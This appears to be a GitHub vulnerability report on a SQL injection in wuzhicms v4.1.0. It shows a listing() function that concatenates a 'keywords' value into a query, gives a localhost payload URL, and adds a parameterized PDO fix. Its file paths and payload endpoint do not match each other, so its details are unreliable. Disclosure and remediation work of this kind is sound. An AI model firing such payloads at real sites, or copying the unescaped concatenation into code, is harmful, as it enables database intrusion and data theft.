
wuzhicms v4.1.0 /coreframe/app/core/admin/copyfrom.php sql injection vulnerability #166

Open
@letmejustdoit

Vulnerability file: /coreframe/app/coupon/admin/copyfrom.php:22
public function listing() {
    $siteid = get_cookie('siteid');
    $page = isset($GLOBALS['page']) ? intval($GLOBALS['page']) : 1;
    $page = max($page, 1);
    if (isset($GLOBALS['keywords'])) {
        // The request's keywords value is concatenated into the WHERE clause unescaped.
        $keywords = $GLOBALS['keywords'];
        $where = "name LIKE '%$keywords%'";
    } else {
        $where = '';
    }
    $result = $this->db->get_list('copyfrom', $where, '*', 0, 20, $page);
    $pages = $this->db->pages;
    $total = $this->db->number;
    include $this->template('copyfrom_listing');
}

Payload:
http://127.0.0.1/index.php?m=promote&f=index&v=search&_su=wuzhicms
1
&fieldtype=place&keywords=1111%'*%23
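
One way to write the keyword search from listing() so the value is bound as a parameter instead of concatenated into the WHERE clause. This is an added example, not wuzhicms code and not part of the original report: it uses PDO in place of the project's $this->db wrapper, and search_copyfrom(), escape_like() and the sample rows are hypothetical.

```php
<?php
// Added example: PDO stands in for wuzhicms's own $this->db wrapper (assumption).

/** Escape LIKE metacharacters so the keyword only ever matches literally. */
function escape_like(string $s): string {
    // '!' is the escape character declared in the query below.
    return strtr($s, ['!' => '!!', '%' => '!%', '_' => '!_']);
}

/** Hypothetical replacement for the keyword branch of listing(). */
function search_copyfrom(PDO $pdo, string $keywords, int $page = 1): array {
    $limit  = 20;
    $offset = (max($page, 1) - 1) * $limit;

    // The SQL text is constant; user input travels only as a bound value.
    $stmt = $pdo->prepare(
        "SELECT * FROM copyfrom WHERE name LIKE :kw ESCAPE '!' " .
        "LIMIT :lim OFFSET :off"
    );
    $stmt->bindValue(':kw', '%' . escape_like($keywords) . '%', PDO::PARAM_STR);
    $stmt->bindValue(':lim', $limit, PDO::PARAM_INT);
    $stmt->bindValue(':off', $offset, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data in an in-memory SQLite database.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE copyfrom (id INTEGER PRIMARY KEY, name TEXT)");
$pdo->exec("INSERT INTO copyfrom (name) VALUES ('Reuters'), ('AP News'), ('100% Local')");

// An ordinary keyword.
var_dump(search_copyfrom($pdo, 'News'));

// The keywords value from the report, URL-decoded: the quote, '*' and '#'
// are compared as data, so the statement's structure cannot change.
var_dump(search_copyfrom($pdo, "1111%'*#"));

// A bare wildcard is escaped and matches only names containing a literal '%'.
var_dump(search_copyfrom($pdo, '%'));
```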
